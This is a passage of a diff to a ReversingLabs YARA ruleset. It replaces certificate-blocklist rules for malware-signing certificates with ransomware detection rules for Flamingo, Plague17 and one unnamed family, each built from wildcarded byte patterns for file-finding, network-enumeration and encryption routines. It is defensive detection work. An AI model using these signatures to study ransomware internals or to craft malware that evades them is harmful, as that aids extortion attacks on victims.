+            80 3B ?? 75 ?? 80 7B ?? ?? 75 ?? 8B 15 ?? ?? ?? ?? 8D 3C 85 ?? ?? ?? ?? 8B 04 17 53
+            50 FF 15 ?? ?? ?? ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 3C 85 ?? ?? ?? ?? 8B 14 0F 68 ?? ??
+            ?? ?? 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0C 07 68 ?? ?? ?? ?? 53 51 FF 15 ?? ??
+            ?? ?? 8B 15 ?? ?? ?? ?? 8B 04 17 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24
+            ?? 50 FF 15 ?? ?? ?? ?? 53 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 33 C0
+            5B 8B E5 5D C2
+        }
+		$enum_network_resources = {
+            55 8B EC 8B 4D ?? 83 EC ?? 8D 45 ?? 50 51 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ??
+            FF D3 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 57 90 8B 4D ?? 8D
+            55 ?? 52 56 8D 45 ?? 50 51 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? 33 FF 39 7D ?? 76 ?? 83 C6 ?? 8D 64 24 ?? F6 46 ?? ?? 74 ?? F6 46 ?? ?? 74 ??
+            8B 06 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D 94 00 ?? ?? ?? ?? 52
+            6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? 85 C0 74 ??
+            8B 16 0F B7 0A 66 89 08 83 C2 ?? 83 C0 ?? 66 85 C9 75 ?? FF 05 ?? ?? ?? ?? 8B 56 ??
+            83 E2 ?? 80 FA ?? 75 ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 47 83 C6 ?? 3B 7D ?? 72
+            ?? 8B 75 ?? E9 ?? ?? ?? ?? 56 6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 5F 8B 4D ?? 51 FF 15
+            ?? ?? ?? ?? 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 EC ?? 53 56 57 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            89 45 ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ??
+            ?? 8B F4 85 F6 0F 84 ?? ?? ?? ?? 8B D6 81 EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D6 81
+            EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D6 8B CE 8B FE 81 EA ?? ?? ?? ?? 33 C0 81 E9 ??
+            ?? ?? ?? 81 EF ?? ?? ?? ?? 83 C2 ?? C6 46 ?? ?? 89 55 ?? 8B 5D ?? 8A D0 80 E2 ?? 02
+            90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 01 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ??
+            ?? ?? 32 90 ?? ?? ?? ?? 88 94 07 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32
+            90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32
+            90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32
+            90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 83 C0 ?? 32
+            90 ?? ?? ?? ?? 88 54 06 ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 4D ?? 50 51
+            FF 15 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? C7 45
+            ?? ?? ?? ?? ?? FF D6 85 C0 75 ?? 8B 3D ?? ?? ?? ?? 8D 49 ?? 68 ?? ?? ?? ?? FF D7 8D
+            45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D6 85 C0 74 ?? 50 FF 15 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B FC 85 FF 0F 84 ?? ?? ?? ?? 8B D7 81 EA ?? ?? ??
+            ?? 83 C2 ?? 89 55 ?? 8B D7 81 EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D7 8B CF 8B F7 81
+        }
+		$encrypt_files_p2 = {
+            EA ?? ?? ?? ?? 33 C0 81 E9 ?? ?? ?? ?? 81 EE ?? ?? ?? ?? 83 C2 ?? C6 47 ?? ?? 89 55
+            ?? 8B 5D ?? 8A D0 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 08 ?? ?? ?? ??
+            8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 30 ?? ?? ?? ?? 8D 50 ??
+            80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8B 5D ?? 8D 50 ??
+            80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8B 5D ?? 8D 50 ??
+            80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8D 50 ?? 80 E2 ??
+            02 90 ?? ?? ?? ?? 83 C0 ?? 32 90 ?? ?? ?? ?? 88 54 07 ?? 83 F8 ?? 0F 8C ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B D8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C8 2B 4D ??
+            B8 ?? ?? ?? ?? F7 E1 8B CA C1 E9 ?? B8 ?? ?? ?? ?? F7 E1 C1 EA ?? 8B C2 C1 E0 ?? 2B
+            C2 03 C0 03 C0 2B C8 8B F2 B8 ?? ?? ?? ?? F7 E6 A1 ?? ?? ?? ?? 51 C1 EA ?? 8B CA C1
+            E1 ?? 2B CA 03 C9 03 C9 2B F1 56 52 8B 15 ?? ?? ?? ?? 52 50 53 57 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 DB 0F 84 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B D8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C8 2B
+            4D ?? B8 ?? ?? ?? ?? F7 E1 8B CA C1 E9 ?? B8 ?? ?? ?? ?? F7 E1 C1 EA ?? 8B C2 C1 E0
+            ?? 2B C2 03 C0 03 C0 2B C8 8B F2 B8 ?? ?? ?? ?? F7 E6 A1 ?? ?? ?? ?? 51 C1 EA ?? 8B
+            CA C1 E1 ?? 2B CA 03 C9 03 C9 2B F1 56 52 8B 15 ?? ?? ?? ?? 52 50 53 57 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 DB 0F 85 ?? ?? ?? ?? 8D 65 ?? 5F 5E 5B 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x94\\x90\\xE5\\xB1\\xB1\\xE4\\xB8\\x87\\xE4\\xB8\\x9C\\xE6\\xB6\\xA6\\xE6\\x92\\xAD\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:f6:2c:9c:4e:fc:81:ca:f0:d5:a2:60:80:09:d4:80:18" or pe.signatures [ i ] . serial == "f6:2c:9c:4e:fc:81:ca:f0:d5:a2:60:80:09:d4:80:18" ) and 1292889599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_network_resources ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Cc8D902Da36587C9B2113Cd76C3C3F8D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Flamingo : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Flamingo ransomware."
 		author = "ReversingLabs"
-		id = "f9e542aa-eaa5-50a5-95dc-fb55f8575c89"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "333ef1f9-ac54-5a3d-9b2b-50483eeb93e1"
+		date = "2021-04-14"
+		modified = "2021-04-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2750-L2768"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "25e524d23ccc1c06f602a086369ffd44b8c97b76c29f068764081339556b3465"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Flamingo.yara#L1-L54"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "446c0d332af01c0fceb0356d5ab273eb55764869cc8343468b75625e5d4d1036"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Flamingo"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE9\\x87\\x91\\xE4\\xBF\\x8A\\xE5\\x9D\\xA4\\xE8\\xAE\\xA1\\xE7\\xAE\\x97\\xE6\\x9C\\xBA\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x8D\\xE5\\x8A\\xA1\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:cc:8d:90:2d:a3:65:87:c9:b2:11:3c:d7:6c:3c:3f:8d" or pe.signatures [ i ] . serial == "cc:8d:90:2d:a3:65:87:c9:b2:11:3c:d7:6c:3c:3f:8d" ) and 1292544000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_328Bdcc0F679C4649147Fbb3Eb0E9Bc6 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "8e2c2204-8905-5e05-9ec8-e1577ae4c2cb"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2770-L2786"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6d9e1f25ca252ca9dda7714c52a2e57fd3b5dca08cd2a45c9dec18a31d3bb342"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
+            ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15
+            ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
+            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
+            80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85
+            C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F
+            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
+        }
+		$encrypt_files = {
+            68 ?? ?? ?? ?? 83 EC ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B CC C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ??
+            ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85
+            ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? 51 6A ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ??
+            C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ??
+            C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8B BD ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 47 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ??
+            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ??
+            8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nooly Systems LTD" and pe.signatures [ i ] . serial == "32:8b:dc:c0:f6:79:c4:64:91:47:fb:b3:eb:0e:9b:c6" and 1204847999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_5F78149Eb4F75Eb17404A8143Aaeaed7 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Plague17 : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Plague17 ransomware."
 		author = "ReversingLabs"
-		id = "4c9d3bba-4e7f-5bf5-ab90-f2b900ec0b2a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "065c47b5-f459-529e-8046-7394a742b50a"
+		date = "2021-02-19"
+		modified = "2021-02-19"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2788-L2804"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0c7c9e8d2a9304e0407b8a1a29977312a9ba766a4052c6b874855fa187c85585"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Plague17.yara#L1-L263"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e0e518fc83a62d70b83df273c6ba469e6f0fdf9c035126428ec7561e04437b6f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Plague17"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE5\\x9F\\x9F\\xE8\\x81\\x94\\xE8\\xBD\\xAF\\xE4\\xBB\\xB6\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "5f:78:14:9e:b4:f7:5e:b1:74:04:a8:14:3a:ae:ae:d7" and 1303116124 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_629D120Dd84F9C1688D4Da40366Fab7A : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "7e6249ba-3a4f-5096-be32-779e73c88221"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2806-L2822"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "187f6ef0de869500526d1b0d5c6f6762b0a939e06781e633a602834687c64023"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            55 89 E5 57 56 8D 85 ?? ?? ?? ?? 53 81 EC ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 31 C0 66 89
+            85 ?? ?? ?? ?? 8B 45 ?? 89 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 50 ?? 8B
+            00 66 83 7C 50 ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ??
+            ?? 2B 51 ?? 39 D0 0F 87 ?? ?? ?? ?? 8B 4D ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 45 ?? 8B 7D ?? 83 EC ?? 8B 00 8B 57 ?? 8D 8D ?? ?? ?? ?? 8D 14 50 C6 44
+            24 ?? ?? 89 04 24 89 8D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 54 24 ?? E8 ?? ?? ?? ?? 83
+            EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 39 D0 0F
+            87 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 83 EC ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 7D ?? 8D
+        }
+		$find_files_p2 = {
+            9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 89 D9 8B 00 C6 44 24 ?? ?? 8B 57 ?? 89 B5 ?? ?? ??
+            ?? 89 04 24 8D 14 50 89 54 24 ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 89 1C 24
+            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 89 5C 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 89 C6 0F 84 ??
+            ?? ?? ?? 8D BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74
+            ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? F6 85 ?? ??
+            ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 0F 85 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 83 EC ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? C7 44 24 ??
+            ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? 89 5C 24 ?? 89 34 24 FF 15 ?? ?? ??
+            ?? 83 EC ?? 85 C0 75 ?? 89 34 24 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 9D ?? ?? ??
+            ?? 83 EC ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2 ?? ?? 8D 76
+            ?? 8D BC 27 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74
+        }
+		$find_files_p3 = {
+            8B 45 ?? F6 85 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 75
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 EC ?? 39 D0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 89
+            C3 8B 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8D B5 ?? ?? ?? ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ??
+            ?? EB ?? 89 C3 8B 85 ?? ?? ?? ?? 39 F0 75 ?? EB ?? EB ?? EB ?? 89 C3 EB ?? C7 04 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
+        }
+		$encrypt_files_p1 = {
+            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 8B 45 ?? 89 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 00 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 83
+            F8 ?? 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 89 C6 8D 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ??
+            89 34 24 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ??
+            89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 34 24 05 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 89 44 24 ?? 83 D2 ?? A1 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 54 24 ?? 89 85
+            ?? ?? ?? ?? FF D0 31 C0 83 EC ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 AB 7C ?? 0F
+            8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 74 24 ?? 89 04 24 FF 15 ?? ?? ?? ??
+            83 EC ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F
+            85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 35 ?? ?? ?? ?? 0B 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
+            80 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ??
+            ?? ?? 89 D9 89 04 24 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ??
+            ?? ?? 83 EC ?? 8B B5 ?? ?? ?? ?? 89 D9 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 1E 0F A4 C2 ?? C1 E0 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D
+        }
+		$encrypt_files_p2 = {
+            85 ?? ?? ?? ?? 89 04 24 8B 0E E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 04 24 8B
+            85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24
+            ?? 8B 0E E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 89 04 24 89 54
+            24 ?? 8B 0E 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ??
+            ?? ?? 85 FF 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95
+            ?? ?? ?? ?? 8D BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8B 85
+            ?? ?? ?? ?? 89 54 24 ?? 89 04 24 FF 95 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? C7 04 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89
+            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            1B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 0F AC D0 ?? C1 EA ?? 89 D3 09
